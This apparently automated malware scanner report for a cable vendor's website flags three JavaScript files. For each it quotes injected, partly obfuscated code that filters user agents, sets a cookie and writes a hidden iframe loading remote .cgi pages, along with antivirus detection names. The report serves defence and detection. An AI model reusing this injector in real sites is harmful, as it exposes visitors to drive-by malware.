New scan:

Malware Scanner report for wiresandcables.in

Malicious/Suspicious/Total urls checked
3/0/15
3 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/1
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://wiresandcables.in/
200 OK
Content-Length: 37612
Content-Type: text/html
clean
http://wiresandcables.in/lofslidernews/js/jquery.js
200 OK
Content-Length: 1820
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function ddd_prover_ua(){
var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox
... 893 bytes are skipped ...
decodeURIComponent(matches[1]) : undefined;
}
if (!ddd_prover_ua()) {
var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la');
if (cookie == undefined) {
setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401);
document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>');
}
}
})();

Decoded script:


<iframe src="http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe>

Antivirus reports:

Sophos
Troj/JSRedir-LH

http://wiresandcables.in/lofslidernews/js/jquery.easing.js
200 OK
Content-Length: 3631
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function ddd_prover_ua(){
var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox
... 2784 bytes are skipped ...
ches ? decodeURIComponent(matches[1]) : undefined;
}
if (!ddd_prover_ua()) {
var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la');
if (cookie == undefined) {
setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401);
document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://vavagen.powercatfan.com/awwgrru.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>');
}
}
})();

Decoded script:


<iframe src="http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe>

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
DrWeb
JS.IFrame.564
Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/IFrame.XX!tr
VIPRE
Malware.JS.Generic (JS)

http://wiresandcables.in/lofslidernews/js/script.js
200 OK
Content-Length: 1820
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function ddd_prover_ua(){
var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox
... 893 bytes are skipped ...
decodeURIComponent(matches[1]) : undefined;
}
if (!ddd_prover_ua()) {
var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la');
if (cookie == undefined) {
setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401);
document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>');
}
}
})();

Decoded script:


<iframe src="http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe>

Antivirus reports:

Sophos
Troj/JSRedir-LH

http://wiresandcables.in/index.html
200 OK
Content-Length: 37612
Content-Type: text/html
clean
http://wiresandcables.in/about_us.html
200 OK
Content-Length: 45118
Content-Type: text/html
clean
http://wiresandcables.in/enquiry.html
200 OK
Content-Length: 37343
Content-Type: text/html
clean
http://wiresandcables.in/contact_us.html
200 OK
Content-Length: 34277
Content-Type: text/html
clean
http://wiresandcables.in/data-cables.html
200 OK
Content-Length: 39042
Content-Type: text/html
clean
http://wiresandcables.in/cnc-cables.html
200 OK
Content-Length: 24805
Content-Type: text/html
clean
http://wiresandcables.in/belden-cables.html
200 OK
Content-Length: 39078
Content-Type: text/html
clean
http://wiresandcables.in/vga-cables.html
200 OK
Content-Length: 39152
Content-Type: text/html
clean
http://wiresandcables.in/projector-cables.html
200 OK
Content-Length: 38901
Content-Type: text/html
clean
http://wiresandcables.in/rf-cables.html
200 OK
Content-Length: 38704
Content-Type: text/html
clean
http://wiresandcables.in/coaxial-cables.html
200 OK
Content-Length: 39161
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: wiresandcables.in

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 11:52:31 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 37612
Content-Type: text/html
Last-Modified: Mon, 04 Aug 2014 07:31:44 GMT

...37612 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: wiresandcables.in
Referer: http://www.google.com/search?q=wiresandcables.in

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=wiresandcables.in

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wiresandcables.in/

Result: wiresandcables.in is not infected or malware details are not published yet.